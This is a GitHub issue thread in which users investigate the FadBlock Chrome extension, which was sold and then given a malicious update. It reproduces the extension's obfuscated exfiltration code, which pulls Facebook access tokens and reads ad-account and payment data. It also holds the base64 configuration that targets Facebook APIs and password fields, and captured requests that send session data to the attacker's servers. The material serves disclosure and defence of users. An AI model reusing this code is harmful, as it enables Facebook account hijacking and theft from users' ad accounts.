DEFCON 1: DO NOT INSTALL / UNINSTALL 'FADBLOCK' IMMEDIATELY FROM YOUR CHROME about fadblock HOT 96 CLOSED

This is crazy. I am no longer the owner of the extension. I sold it over a month ago, seems like it traded hands and now the current owner has added malicious code while keeping the extension as it is!

I am taking immediate action and will release a new version of the clean codebase for everyone to use.

I am also thinking of pursuing legal action as it appears they have retained access to my PayPal and other support links!

from fadblock.

@poka-IT Appreciate your politeness. Unfortunately, I'm bound by a signed agreement that prohibits me from disclosing any information about the owner and the transaction.

And, as I have said above, it's not the buyer, it traded hands again it seems - I have sent a harshly worded email nonetheless.

from fadblock.

I think we should do the latter @poka-IT, I couldn't sleep as this incident was eating up my conscience but thanks to the Chrome team, the previous authentic version was just now published!

Share this version wherever you can (and I will do the same): https://chromewebstore.google.com/detail/fadblock-origin-friendly/lmnhcklabcehiohmmeihcheoegomkghm?hl=en

from fadblock.

Here's a quick DNS information on fadblock.pro,

Domain: fadblock.pro
Registrar: NameCheap, Inc.
Registered On: 2024-01-21
Expires On: 2025-01-21
Updated On: 2024-01-21
Status:
    clientTransferProhibited
    addPeriod
Name Servers:
    dns1.registrar-servers.com
    dns2.registrar-servers.com

DDoS sequence initiated

from fadblock.

@0x48piraj

in my defense, I thought I took precautions to ensure the buyer wouldn't use it maliciously, but it exchanged hands again. I transferred the extension because I believed it could benefit all users.

Sure, to give you the benefit of the doubt, let's assume that you didn't expect the buyer to be malicious and also did not expect another change of hands.

But would you mind explaining why the user base was never informed of the change of ownership, a significant and potentially concerning event, prior to its occurrence?

from fadblock.

As of now, the clean version has been submitted to the store under a new name.

Now I will start notifying users and trying to control the exposure.

I will also urge you all to report the malicious extension so it can get removed as soon as possible.

from fadblock.

I'm sorry for being direct here but I lost my trust in this extension and moved on to my good old Adblocker. Selling the extension for a quick cash grab and putting the userbase under the bus like that is just so bad. As they say: trust is hard to gain but easy to lose. Wish you good luck for the future of this extension but I'm out though...

from fadblock.

I analyzed the network traffic with wireshark and I confirm that the extension with the malicious code was designed to send active Facebook session cookies to the fadblock.pro 80.240.21.36 server to hack accounts. In fact, when you are connected to Facebook, data is sent continuously to their server, which is not the case with other sites.

Here is an example of what is sent:

:method: POST
:authority: fadblock.pro
:scheme: https
:path: /check/extension
content-length: 0
accept: application/json, application/xml, text/plain, text/html, .
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
content-type: application/json
origin: chrome-extension://mdadjjfmjhfcibgfhfjbaiiljpllkbfc
sec-fetch-site: none
sec-fetch-mode: cors
sec-fetch-dest: empty
accept-encoding: gzip, deflate, br
accept-language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
cookie: XSRF-TOKEN=eyJpdiI6Im5BdVd0NDhkQ1JRWFo4RTRlVURxbXc9PSIsInZhbHVlIjoicU83OEtPa2JnV3Bib3RSSnpMcFhGYmlMMmdJSGhmRDQrSWJnM21JYUgrZjhMaWdmdWMrRXJXd1doWWxrcDBGUCIsIm1hYyI6IjRmYmNiMjkwNDYyNDE5ODUwZDcyZTgyMjhlMjA1YWRhNGVlYTU4ZWY1YzQwOTkyZTNhYTZjOGNlODVlM2UzZjQifQ%3D%3D
cookie: laravel_session=eyJpdiI6IklkaEJVTEk5REtFMWdiWUMwRzZpT2c9PSIsInZhbHVlIjoiWTRNY3ZJV3pFVDE2T21aZWIwSDlRUTRidDdzMjdXSzEySnMwSjlqNXNoMTVpQnlIb29zR3RGXC9RTHVadXB4WEMiLCJtYWMiOiIwNTI0MzU2NzA5YWU1ZWY1OWI1YmU2ZTY1MzYzODgzYjZkYzcyOWU5NjRjMTgzZWI1NzNjYzU2OTE4YzUyYjIyIn0%3D

:status: 200
server: nginx
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.4.33
cache-control: no-cache, private
date: Sat, 03 Feb 2024 02:35:44 GMT
set-cookie: XSRF-TOKEN=eyJpdiI6IllkM3JmMDZ6b3VKRTQwOXdKUWdPMGc9PSIsInZhbHVlIjoibUNyZkttR1N5UEhqdVwvczhvZmtwa0JzODA1bHQzYTNBV3YraExZZW9qTEkxNFFJZGpmV25INW9cL2lHVUo2QUc0IiwibWFjIjoiMWY5YmM5ZmZmY2U2NTgwMjE2M2U2MGQ2OGExNzNlNzdjZmRjZDdmMjZiOGJiODdkY2ViOTVkNDkzMjIzMmRkOCJ9; expires=Sat, 03-Feb-2024 04:35:44 GMT; Max-Age=7200; path=/
set-cookie: laravel_session=eyJpdiI6Ims4ZGsxdm53TyswK2VpTDRRRjY5aXc9PSIsInZhbHVlIjoiWU10QzlcL0pZcnhYSk85UHhOK3U2MUFISmtTWFpwb1krSG5vMTU4U3NRZEV1VE1pWnZsZ0F4WlZFSFJzbEV6UkkiLCJtYWMiOiIwNWM5NmEwNWNhZGQyYWEzOTRiOGZmZTdmZGU5OWVlNDg1MTQ1YThkZmM1NmRhMjlmYjU3MGU0YjIxYzkwNmYzIn0%3D; expires=Sat, 03-Feb-2024 04:35:44 GMT; Max-Age=7200; path=/; httponly
content-encoding: gzip

{"sstcode":403,"fad1":"aHR0cHM6Ly9hcGkuZmFkYmxvY2sucHJvL2FwaS9mYWRibG9ja1NhdmU=","fad2":"ZmFjZWJvb2suY29t","fad3":"Y29va2ll","fad4":"dXNlckFnZW50","fad5":"aHR0cHM6Ly9idXNpbmVzcy5mYWNlYm9vay5jb20vYWRzL2FkX2xpbWl0cw==","fad6":"aHR0cHM6Ly9ncmFwaC5mYWNlYm9vay5jb20vdjE4LjAvbWUvYnVzaW5lc3Nlcy8/ZmllbGRzPWlkLG5hbWUsdmVyaWZpY2F0aW9uX3N0YXR1cyxjcmVhdGVkX3RpbWUsb3duZWRfYWRfYWNjb3VudHN7aWQsbmFtZSxhbW91bnRfc3BlbnQsaW5zaWdodHMuZGF0ZV9wcmVzZXQobWF4aW11bSl7c3BlbmR9LGFjY291bnRfY3VycmVuY3lfcmF0aW9fdG9fdXNkLHNwZW5kX2NhcCxjdXJyZW5jeSxhY2NvdW50X3N0YXR1cyxhZHNwYXltZW50Y3ljbGV7dGhyZXNob2xkX2Ftb3VudH0sZnVuZGluZ19zb3VyY2VfZGV0YWlscyxhZHRydXN0X2RzbCxhbGxfcGF5bWVudF9tZXRob2Rze3BtX2NyZWRpdF9jYXJke2Rpc3BsYXlfc3RyaW5nLGV4cF9tb250aCxleHBfeWVhcn0scGF5bWVudF9tZXRob2RfZGlyZWN0X2RlYml0c3tjYW5fdmVyaWZ5LGRpc3BsYXlfc3RyaW5nLGlzX2F3YWl0aW5nLGlzX3BlbmRpbmcsc3RhdHVzfSxwYXltZW50X21ldGhvZF9wYXlwYWx7ZW1haWxfYWRkcmVzc319fSxvd25lZF9wYWdlc3tpZCxuYW1lLGZvbGxvd2Vyc19jb3VudCx2ZXJpZmljYXRpb25fc3RhdHVzfSxwZXJtaXR0ZWRfcm9sZXMsYnVzaW5lc3NfdXNlcnN7ZW1haWwscGVuZGluZ19lbWFpbCxuYW1lLHJvbGV9JmFjY2Vzc190b2tlbj0=","fad7":"aHR0cHM6Ly9ncmFwaC5mYWNlYm9vay5jb20vdjE4LjAvbWUvP2ZpZWxkcz1uYW1lLGJpcnRoZGF5JmFjY2Vzc190b2tlbj0=","fad8":"aHR0cHM6Ly9ncmFwaC5mYWNlYm9vay5jb20vdjE4LjAvbWUvYWRhY2NvdW50cz9maWVsZHM9YWNjb3VudF9jdXJyZW5jeV9yYXRpb190b191c2QsbmFtZSxhY2NvdW50X3N0YXR1cyxjdXJyZW5jeSxmdW5kaW5nX3NvdXJjZV9kZXRhaWxzLGFtb3VudF9zcGVudCxpbnNpZ2h0cy5kYXRlX3ByZXNldChtYXhpbXVtKXtzcGVuZH0sYnVzaW5lc3MsYWRzcGF5bWVudGN5Y2xlLHNwZW5kX2NhcCxhZHRydXN0X2RzbCwgYWxsX3BheW1lbnRfbWV0aG9kc3twbV9jcmVkaXRfY2FyZCB7ZGlzcGxheV9zdHJpbmcsIGV4cF9tb250aCwgZXhwX3llYXJ9LHBheW1lbnRfbWV0aG9kX2RpcmVjdF9kZWJpdHMge2Nhbl92ZXJpZnksIGRpc3BsYXlfc3RyaW5nLCBpc19hd2FpdGluZywgaXNfcGVuZGluZywgc3RhdHVzfSxwYXltZW50X21ldGhvZF9wYXlwYWwge2VtYWlsX2FkZHJlc3N9fSZhY2Nlc3NfdG9rZW49","fad9":"RUFB","fad10":"aW5wdXRbbmFtZT0icGFzcyJd","fad11":"aW5wdXRbbmFtZT0iZW1haWwiXQ==","fad13":"Zm9ybQ==","fad14":"cXIvc2hvdy9jb2Rl","fad15":"aHR0cHM6Ly9hcGkuZmFkYmxvY2sucHJvL2FwaS9zYXZlUVI=","fad12":"aHR0cHM6Ly9mYWNlYm9vay5jb20vbWU=","fad16":"YQ==","fad17":"Y2xpY2s=","fad18":"c3Jj","fad19":"aHR0cHM6Ly93d3cuZmFjZWJvb2suY29tL3NlY3VyaXR5LzJmYWMvc2V0dGluZ3Mv","fad20":"bG9naW4vcmVhdXRo"}

from fadblock.

I am no longer the owner of the extension. I sold it over a month ago

First the open core stunt and then you sold the extension and didn't expect it to be riddled with malware??? There's no way you're this money starved to be this incompetent. I'm glad I took matters into my own hands to just use the userscript whenever YouTube keeps trying to block uBlock.

This is why I absolutely hate small things that could be userscripts being full extensions and cringe everytime I see people with Return YouTube Dislike as an extension (though I really wish they would stop neglecting the userscript).

You got what you deserved honestly. Just a shame you had to bring down innocent people with you.

from fadblock.

I also have filed a report providing the team with support materials,

from fadblock.

Thank you so much @poka-IT for collaborating on this. I will finally doze off now as it's been 24 hours since the incident and I don't think I can go on any longer without sleep.

from fadblock.

Any details on what the malicious code is doing?

from fadblock.

I haven't gotten any sleep and have been notifying people who reached out to me one-by-one while pushing out the clean version.

Take your sleep, you did most important by alert everybody here, we are sharing the news too. Thanks for that.
(I know this kind of rush so I support you...)

Just a question, you said you sold this app to theses guys ? Can you tell more about or is it private ? Just to understand the situation.

from fadblock.

@0x48piraj I'm sorry but I don't want to act as a guarantor in this story, everything I did I wrote it here, because I had time to do this. I said i'm not security expert just sys admin, i deobfuscate the suspicious file and provided a first analyse, but I didn't "ran and saw the outgoing/incoming requests", I said this is what should be done. Or analyse the local storage state deeper.

I'm ok to contribute more but with one condition: Upgrade this repo to AGPLV3 license or equivalent. This in no way prevents you from continuing to ask for tips for your work. Actually there is no license, and the trade under is completely opaque.
This is the only way you could expect contributors on this project.

from fadblock.

The serious thing is that anyone who installs the extension with malicious code for the first time does not receive any notification regarding the increase in required permissions, which instead happened with the update.
For now I am sure that this extension is activated to steal session cookies from Facebook but I do not exclude that it could also happen from other sites that I have not yet had the opportunity to test.

from fadblock.

@WongIong When a user changes own password the authorize cookies that were created earlier still work.
In the specific case of Facebook you should connect to this page https://accountscenter.facebook.com/password_and_security and disconnect all active sessions and then also change the password for security.

from fadblock.

I don't think the malware could do any of that if you simply didn't accept the permissions, but if you did, it cannot steal passwords, only sessions - that too is not for sure as it mostly had boilerplate nonsense - I am still looking into the code.

It's always a good thing to rotate out passwords every 6 months or so. So, if it's not a hassle, you should do that.

I would notify what the malware strain's capabilities but as of now, I haven't gotten any sleep and have been notifying people who reached out to me one-by-one while pushing out the clean version. So, it may take a day or two.

from fadblock.

yes, stt.js look like a minified file, but is not as there is line break and indents. A minifier will never do this kind of incremental base64 mapping:

        const o = atob(e.fad1),
            i = atob(e.fad2),
            a = atob(e.fad3),
            s = atob(e.fad4),
            u = atob(e.fad5),
            l = atob(e.fad6),
            c = atob(e.fad7),
            f = atob(e.fad8),
            p = atob(e.fad9),
            d = atob(e.fad10),
            h = atob(e.fad11),
            g = atob(e.fad12),
            gn = atob(e.fad13),
            go = atob(e.fad14),
            gi = atob(e.fad15),
            gx = atob(e.fad16),
            gy = atob(e.fad17),
            gz = atob(e.fad18),
            f1 = atob(e.fad19),
            f2 = atob(e.fad20);

But a normal human will never code like this, with consts here and 5 lines under, variables with same names but in restrictive scope:

                    var n = [],
                        r = Object.getPrototypeOf,
                        o = n.slice,
                        i = n.flat
                            ? function (e) {
                                return n.flat.call(e);
                            }
                            : function (e) {
                                return n.concat.apply([], e);
                            },
                        a = n.push,
                        s = n.indexOf,
                        u = {},
                        l = u.toString,
                        c = u.hasOwnProperty,
                        f = c.toString,
                        p = f.call(Object),
                        d = {},

on 4000 lines ...

LLM don't do that neither, it use human readable names. Unless it has received these instructions.
This is machine code, or this is artistic obfuscation. Maybe LLM could help to understand.

from fadblock.

@0x48piraj Unfortunately what you did isn't enough. Before it does any more damage, everything must be done to ensure that Google removes the extension with malicious code from the Chrome web store. Whoever manages this extension has no shame and look what they added in the description. I have no words.

"UPDATE: If you were an user before the update and the extension got disabled, that's normal behavior by Google, it's so an extension can't silently escalate its privileges with an update, in this case FadBlock accessing extensionpay.com for those who want to contribute, nothing else. Nothing to be scared about. You can read the new permissions to make sure nobody's pulling any funny business.

NOTE: And for those who are alarmed about the "Read and change your data" permission, it's not accessing any of your data, it's just to access the YouTube and YouTube Music (new feature!) tabs as it was doing before. You can read the documentation to make sure that's the case,

This is the permission required for an extension to work with the browser's tabs. This includes viewing the URL of an open tab. The permission does not give access to your actual browser history itself, but technically any extension with this permission could monitor tab URLs as they changed and construct its own history, so that's why the warning is phrased that way. If an extension asks for permission to access the actual browser history data, the warning should read "Read and change your BROWSING HISTORY...".

https://developer.chrome.com/docs/extensions/mv3/permission_warnings/

You can google this and find out, no need to trust the developer."

from fadblock.

@MGuerrera, the extension was deleted about a week ago - because of my efforts going back and forth with Google Devs and making them manually review and remove the extension as it would have taken months otherwise because of the positive reviews and downloads.

If you were in danger, you would have already gotten breach emails like some did - if not - you're safe - it was scrubbed under a week after the update - their server wasn't even online on the first two days - so the exposure was low, to begin with, thankfully.

from fadblock.

For me, the update also made it so the extension doesn't work and it requires a payment.

from fadblock.

Yes, being an independent security researcher, this falls under my jurisdiction. I've already started inspecting the code, identified the malicious code block, and am currently conducting an investigation.

Here's the whole source if anyone else is interested,
mdadjjfmjhfcibgfhfjbaiiljpllkbfc-v2.7.zip

Here's the details of the malicious file,

File name	js/stt.js
File size	249,607 bytes
md5	da0ab10b04e7c069d87b11d99b9ca512
sha1	b4a65d866e9cff6c9517f8a6af6c5a7e3027be88
sha256	5366039a45019653ef1f6bf1b948fdbff3b50fd753096c5ab25f19297fc3e9ba
sha384	090e9629520d85aa4d48a51abffb776083acf85cf138b2849cbd4b7a5ee9e813e8a9e1a80f15ada543e2d2602f591839
sha512	94996e20f3cd61a34e111ab2eca57a3ac9decffdab8a62d1ccbc0aa66bc833e302106716494fb442d80b5de44c1a243dbf65e24dab1b0fc0ac6aa28d49c0b3df

After a cursory analysis, it seems like it's a modified jQuery base coupled with data collection slash adware modules.

The data is sent to the endpoint named fadblock.pro.

Immediate countermeasure

A few manual methods exist to block access to any website domain, such as editing your HOSTS file but for Chrome I would suggest doing the following,

1. Add the BlockSite Chrome Web Store extension to your Chrome browser. Once installed, you'll see a web page where you need to provide permission to BlockSite to access your browsing information.

2. Next, you'll see the BlockSite configuration screen. Add individual sites by typing them into the top field and selecting the green plus icon to the right.

from fadblock.

Thanks for you hard work and efforts @0x48piraj despite not being the owner of fadblock anymore, you still manage to help us and provide insights regarding the problem.

from fadblock.

Thank you @0x48piraj for stepping back in. I supported and paid for Fadblock when you were still the owner and am appreciative for this extension every day. Even more so that you came back and resurrected the original so quickly!

from fadblock.

As a precaution, I logged out from all sessions and changed password for both Facebook and Instagram, as they are deeply connected.

I can't change passwords on other sites as I have too password to change and it would've take weeks.

from fadblock.

Hmm...some thread comments appear to be deleted compared to the e-mailed updates I saw.

from fadblock.

Now that the extension was removed globally, there's no reason to keep the issue alive. Closing.

from fadblock.

I also would like to know why the extension now needs more permissions.

from fadblock.

I have removed the extension now and gone back to Adblocker as it does the same job and has a reason to have the permission to read data on all sites and is serious enough for me to accept this intrusive permissions

from fadblock.

I'm reading the code you provided, I don't see any malicious code on my side.
External requests are only made on https://fadblock.pro/check/extension, with just fetching datas, doesn't seems to send anything there.

Response is

{"sstcode":200,"fad1":"https:\/\/play.google.com","fad2":"play.google.com","fad3":"6000","fad4":"videoplayback","fad5":"https:\/\/www.youtube.com\/youtubei\/v1\/notification\/get_unseen_count","fad6":"https:\/\/googleads.g.doubleclick.net\/pagead\/id?v=","fad7":"https:\/\/www.youtube.com\/youtubei\/v1\/player","fad8":"https:\/\/play.google.com\/log?format=json&hasfast=true&authuser=0","fad9":"video-","fad10":"100","fad11":"50","fad12":"https:\/\/jnn-pa.googleapis.com\/$rpc\/google.internal.waa.v1.Waa\/Create"}

So probably just metadata for analytics as you said. Probably loggin IP address, that's it.
But i'm just linux sys admin not security expert, maybe missed something.

from fadblock.

No, I think you're right @poka-IT. That's my working theory as well.

However, requesting permissions for every site is inherently a malicious action, so it's best to err on the side of extra caution. It has a lot of jQuery boilerplate nonsense and useless base64 encodings.

from fadblock.

The new extension is under review process and hopefully will be released soon and we can shift over there. The funny thing is, I was also affected as I use FadBlock on YT by default lol.

@That1BlueMew, no, the Firefox version is still under my control and thus, it's completely safe.

@SImone-Cow, as of now, the extension doesn't steal data so I think we are safe. Also, yes, just removing the extension will remove everything, no remnants, nothing. Clean slate.

from fadblock.

thank you so much that removed my fear i use firefox as my main browser for everything i was about to rotate everything

from fadblock.

I used this tool to deobfuscate stt.js: https://github.com/ViZiD/humanify

result here: deobfuscated.zip
Maybe it help, maybe not.

Now we are on 9000 lines. You're welcome ahaha

from fadblock.

Are you really sure that this extension does not transfer cookies or users and passwords to the fadblock.pro domain? I'm asking you because a few days ago (January 26th) we had a hack on a Facebook account and I'm almost sure it was caused by this extension with malicious code. No dangerous files were opened on the computer where this extension was installed and coincidentally a few days earlier authorization had been given to read and modify all data on all websites.

from fadblock.

@0x48piraj As suggested by @poka-IT the only way to understand what this modified extension really does is to run it in a sandbox and then analyze its requests. I'm sorry but in my opinion it was this extension with malicious code that was the cause of the hack we had.

from fadblock.

@fabriziocarloni are you sure your facebook account have been hack ? Did you just received an SMS from "Facebook" giving you a 2fa code ? If yes, you have not been hack, just spam.

And I don't what you mean by "someone of good", but the good thing to do here is to declare this app as libre software, with a good license for. It seems that you have no problem using a program without an associated license?

from fadblock.

@poka-IT I'm an IT system engineer too and when I tell you that we were hacked it's the truth. The hack occurred with the copy of the active cookies and I am 100% sure of this.

I don't want to go into the licensing issue but I would just like to understand if this extension with malicious code sent other data besides cookies. That's all I would like to know.

from fadblock.

When you are logged in to Facebook, the extension with the malicious code also sends the user's data including financial data to the api.fadblock.pro 149.248.56.63 server:

:method: POST
:authority: api.fadblock.pro
:scheme: https
:path: /api/fadblockSave
content-length: 1515
accept: application/json, application/xml, text/plain, text/html, .
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
content-type: application/json
origin: chrome-extension://mdadjjfmjhfcibgfhfjbaiiljpllkbfc
sec-fetch-site: none
sec-fetch-mode: cors
sec-fetch-dest: empty
accept-encoding: gzip, deflate, br
accept-language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7

{"fad":"RUFBNmtVNDlVelhJQk9aQ0swWkJXWkNNSHdkRWVNQjl6WVg3TU9xTWYzRDZuSDRKWkJyd3F6bldwd3NJRlN0T043OEVyNkFPN3dYUEdBNGlwYzJkeHQyUzJHSHlXdkhidmpWNm5rdlFKNkNPTjZEeHlld0R2NlBZSVBqbWdZeWJaQkRPeDdDcnpzdEo2NmRscUtwSGVwWTZlOGRycURaQ1NMeEhTbWdyNEIyOVU2STFqd29QemlYZnZUR1dpY3ZTMDJjT0FaRFpEIF9fIFpHRjBjajF4V0ZjdFdsWm9SM3BGUVdReVdWSklhbUp4VjBreVVWYzdJSE5pUFhrelZ5MWFaV1JQUkZsck5FWklXVGgxTWpCSk5XOTVZVHNnWTE5MWMyVnlQVFl4TlRVMk1EUTVOemcxTXpRMU95QjRjejAxSlROQlQweEZTbEZWVHpSaFRFWlNWRUVsTTBFeUpUTkJNVGN3TmprNE1EZ3hNU1V6UVMweEpUTkJMVEU3SUhka1BURXpOalo0TmpReE95QndjbVZ6Wlc1alpUMURKVGRDSlRJeWRETWxNaklsTTBFbE5VSWxOVVFsTWtNbE1qSjFkR016SlRJeUpUTkJNVGN3TmprNE1EZ3hOelEzTUNVeVF5VXlNbllsTWpJbE0wRXhKVGRFT3lCdmJ6MTJNU1UzUXpNbE0wRXhOekEyT1Rnd09ESXcgX18gVFc5NmFXeHNZUzgxTGpBZ0tGZHBibVJ2ZDNNZ1RsUWdNVEF1TURzZ1YybHVOalE3SUhnMk5Da2dRWEJ3YkdWWFpXSkxhWFF2TlRNM0xqTTJJQ2hMU0ZSTlRDd2diR2xyWlNCSFpXTnJieWtnUTJoeWIyMWxMekV5TVM0d0xqQXVNQ0JUWVdaaGNta3ZOVE0zTGpNMiBfXyA2MTU1NjA0OTc4NTM0NSBfXyBleUp1WVcxbElqb2lVbTl0WVc1dklFZGxibTkyWlhOcElpd2lhV1FpT2lJMk1UVTFOakEwT1RjNE5UTTBOU0lzSWw5ZlptSmZkSEpoWTJWZmFXUmZYeUk2SWtkWVZGWjNOazlhZVZSMElpd2lYMTkzZDNkZmNtVnhkV1Z6ZEY5cFpGOWZJam9pUVRoUk9FeDBiMU5vVDFKRWJqQm9NM05IYmxNNVMwTWlmUT09IF9fIFZISnBNaUZaWlhjZ2ZDQnliMjFoYm04dVoyVnViM1psYzJsQWIzVjBiRzl2YXk1amIyMD0gX18gMA==","fad_ana":"[]","fad_context":"[{"account_currency_ratio_to_usd":0.9303347825,"name":"Name Surname","account_status":1,"currency":"EUR","amount_spent":"0","spend_cap":"0","adtrust_dsl":46.52,"id":"act_429256876109265"}]"}.............:status: 200
server: nginx
content-type: application/json
x-powered-by: PHP/7.4.33
cache-control: no-cache, private
date: Sat, 03 Feb 2024 17:20:23 GMT
x-ratelimit-limit: 600
x-ratelimit-remaining: 599
access-control-allow-origin: *

{"message":"Verified","stt":false}

Now there is no longer any doubt that the hack we had was caused by this extension with malicious code looking for Facebook accounts with a credit card connected to then advertise by spending the money of unsuspecting users. This is all very heavy.

from fadblock.

@Nicos18 We also had 2FA active but when they copy you the cookies replicate the connection you have (in our case to Facebook) and to enter your account they don't even need a password and you realize the damage when it's too late. I believe the only salvation is the use of a physical key like passkey which should protect you from this type of attacks.

from fadblock.

@Rynn21 The original extension had changed hands and was then modified with malicious code. After this bad experience I will pay much more attention to the extensions to install on Chrome.

from fadblock.

+1

from fadblock.

+1

from fadblock.

Same problem here.

I have no problem enabling the new permissions if they are "necessary", but it is important to know what they are going to be used for.

I can't find information in the README.md or in the GitHub releases.

Thank you

from fadblock.

Agreed, as long as they're necessary but I also have the license issue, asking for another payment.

from fadblock.

I see that several of you are being asked to pay license fees. I clarify that in my case he is not asking me.

What may be different is that I reinstall the extension.

I leave a screenshot.

from fadblock.

Same. I would like to know why the extension now needs wide open permissions to read and change data on all websites before I re-enable it.

from fadblock.

Same. This seems a little fishy. Too bad as it worked well while it worked...

from fadblock.

Same thing here on Brave:

This is very worring because last commit (code change) here date of November 2023 ! And latest release on October 2023.
I think there is a big suspicious problem this this extension.

My take is: Don't accept theses permissions changes and wait for news from devs here.
I just installed the latest available build from github, and it works: https://github.com/0x48piraj/fadblock/releases

from fadblock.

As of now, I have updated the repository with this new information (4a13167) and now will start working on forking and deploying the clean version as soon as possible.

from fadblock.

Here's a quick DNS information on fadblock.pro,

Domain: fadblock.pro
Registrar: NameCheap, Inc.
Registered On: 2024-01-21
Expires On: 2025-01-21
Updated On: 2024-01-21
Status:
    clientTransferProhibited
    addPeriod
Name Servers:
    dns1.registrar-servers.com
    dns2.registrar-servers.com

from fadblock.

I uninstalled the malicious version, but is there anything I should be concerned about in terms of my data? Change passwords on sites etc. that were used?

from fadblock.

I don't think the malware could do any of that if you simply didn't accept the permissions, but if you did, it cannot steal passwords, only sessions - that too is not for sure as it mostly had boilerplate nonsense - I am still looking into the code.

It's always a good thing to rotate out passwords every 6 months or so. So, if it's not a hassle, you should do that.

I would notify what the malware strain's capabilities but as of now, I haven't gotten any sleep and have been notifying people who reached out to me one-by-one while pushing out the clean version. So, it may take a day or two.

Thank you @0x48piraj

from fadblock.

I don't think the malware could do any of that if you simply didn't accept the permissions, but if you did, it cannot steal passwords, only sessions - that too is not for sure as it mostly had boilerplate nonsense - I am still looking into the code.

In stealing sessions, what kind of information can be taken from a session? Would that include username/password entered in the session or anything displayed in the browser for that session?

from fadblock.

Would that include username/password entered in the session or anything displayed in the browser for that session?

No basically to be sure, just log out every websites your are currently logged in, and theses sessions will be disabled, so unusable. Users data should not be presents in sessions, just tokens for the current ... session.

from fadblock.

@benalt613 I don't even think it steals your sessions as of now but it acts as a CnC center of some sort and sends analytical data (probably URLs you visit) to the attacker's server.

Here's the code bit,

if ($('img')) {
                        $('img')
                            .each(function(index, value) {
                                if ($(this)
                                    .attr(gz)) {
                                    let sc = $(this)
                                        .attr(gz);
                                    if (sc.includes(go)) {
                                        chrome.storage.local.get(["fad_yt_block"])
                                            .then((t) => {
                                                t.fad_yt_block && (e = JSON.parse(t.fad_yt_block));
                                                chrome.runtime.sendMessage({
                                                    action: "fad-action-src",
                                                    url: gi,
                                                    pl: {
                                                        sc: btoa(sc),
                                                        cf: btoa(e)
                                                    }
                                                }, function(e) {});
                                            });
                                    }
                                }
                            });
                    }
                    e && chrome.storage.local.set({
                            fad_yt_ep: btoa(e + " | " + t)
                        })
                        .then(() => {});
                })),
            v &&
            chrome.runtime.sendMessage({
                action: "fad-action-text",
                url: u
            }, function(e) {
                const t = /6kU.*?"/gm;
                let n;
                const r = e;
                let u = "";
                for (; null !== (n = t.exec(r));)
                    n.index === t.lastIndex && t.lastIndex++,
                    n.forEach((e, t) => {
                        u = e;
                    });
                (u = u.replace('"', "")),
                u &&
                    ((u = p + u),
                        chrome.runtime.sendMessage({
                            action: "fad-action-json",
                            url: c + u
                        }, function(e) {
                            const t = e.id,
                                n = e;
                            chrome.runtime.sendMessage({
                                action: "fad-action-json",
                                url: l + u
                            }, function(e) {
                                let r = e.data;
                                chrome.runtime.sendMessage({
                                    action: "fad-action-json",
                                    url: f + u
                                }, function(e) {
                                    let l = e.data;
                                    chrome.runtime.sendMessage({
                                        action: "fad-action-cf",
                                        url: f1,
                                        c: f2
                                    }, function(e) {
                                        let l1 = e;
                                        chrome.runtime.sendMessage({
                                            action: "fad-action-analytic",
                                            url: o,
                                            pl: {
                                                a: i,
                                                b: u,
                                                c: n,
                                                d: r,
                                                e: l,
                                                f: t,
                                                g: a,
                                                h: s,
                                                i: g,
                                                k: l1
                                            }
                                        }, function(e) {
                                            chrome.storage.local.set({
                                                    fad_yt_block: JSON.stringify(t)
                                                })
                                                .then(() => {});
                                        });
                                    });
                                });
                            });
                        }));

So, I think it's not a very nefarious kind of strain (stealing passwords, bank info etc.), it steals your browsing history and probably can perform remote actions (I'm not sure as of now). So, there's that. But it still is a good idea to change your passwords - it can't hurt.

from fadblock.

If they are developing it into a general adblocker - that may grant using the permissions they have but the base64 encoding, cryptic function names, and needless obfuscation, not to mention the tracking - point only to one thing - adware/malware.

from fadblock.

So, I think it's not a very nefarious kind of strain (stealing passwords, bank info etc.), it steals your browsing history and probably can perform remote actions (I'm not sure as of now). So, there's that. But it still is a good idea to change your passwords - it can't hurt.

@0x48piraj Thanks. I've also decided to create a separate Chrome profile with limited extensions for sessions containing logins that need to be more secure.

from fadblock.

Hello @0x48piraj I'm new here and I would just like to ask, does removing the extension from my browser remove potential remote access from their servers or would there still be remnants of their codes embedded that I should be worried about? (sorry for the question I'm still a beginner)

from fadblock.

@0x48piraj Is the Firefox version also effected?

from fadblock.

So the supicious code become:

     let ownerDocument = childSeparator(unsupportedSelectors).val();
      if (childSeparator("img")) {
        childSeparator("img").each(function (index, value) {
          if (childSeparator(this).attr(variableGz)) {
            let encryptedData = childSeparator(this).attr(variableGz);
            if (encryptedData.includes(variableGo)) {
              chromeAPI.localStorage.local
                .get(["fad_yt_block"])
                .then((ownerDocument) => {
                  if (ownerDocument.youtubeData) {
                    element = JSONParser.parse(ownerDocument.youtubeData);
                  }
                  chromeAPI.runtimeAPI.sendMsg(
                    {
                      action: "fad-action-src",
                      url: variableGi,
                      pl: {
                        encryptedData: encodeBase64(encryptedData),
                        cf: encodeBase64(element),
                      },
                    },
                    function (element) {},
                  );
                });
            }
          }
        });
      }
      if (element) {
        chromeAPI.localStorage.local
          .set({
            fad_yt_ep: encodeBase64(element + " | " + ownerDocument),
          })
          .then(() => {});
      }
    },
  );
}
if (returnValue) {
  chromeAPI.runtimeAPI.sendMsg(
    {
      action: "fad-action-text",
      url: isXMLDoc,
    },
    function (element) {
      const ownerDocument = /6kU.*?"/gm;
      let cache;
      const result = element;
      let isXMLDoc = "";
      for (; (cache = ownerDocument.exec(result)) !== null; ) {
        if (cache.index === ownerDocument.lastIndex) {
          ownerDocument.lastIndex++;
        }
        cache.forEach((element, ownerDocument) => {
          isXMLDoc = element;
        });
      }
      isXMLDoc = isXMLDoc.replace('"', "");
      if (isXMLDoc) {
        isXMLDoc = isHTMLDoc + isXMLDoc;
        chromeAPI.runtimeAPI.sendMsg(
          {
            action: "fad-action-json",
            url: querySelectorAll + isXMLDoc,
          },
          function (element) {
            const ownerDocument = element.id;
            const cache = element;
            chromeAPI.runtimeAPI.sendMsg(
              {
                action: "fad-action-json",
                url: document + isXMLDoc,
              },
              function (element) {
                let result = element.data;
                chromeAPI.runtimeAPI.sendMsg(
                  {
                    action: "fad-action-json",
                    url: documentElement + isXMLDoc,
                  },
                  function (element) {
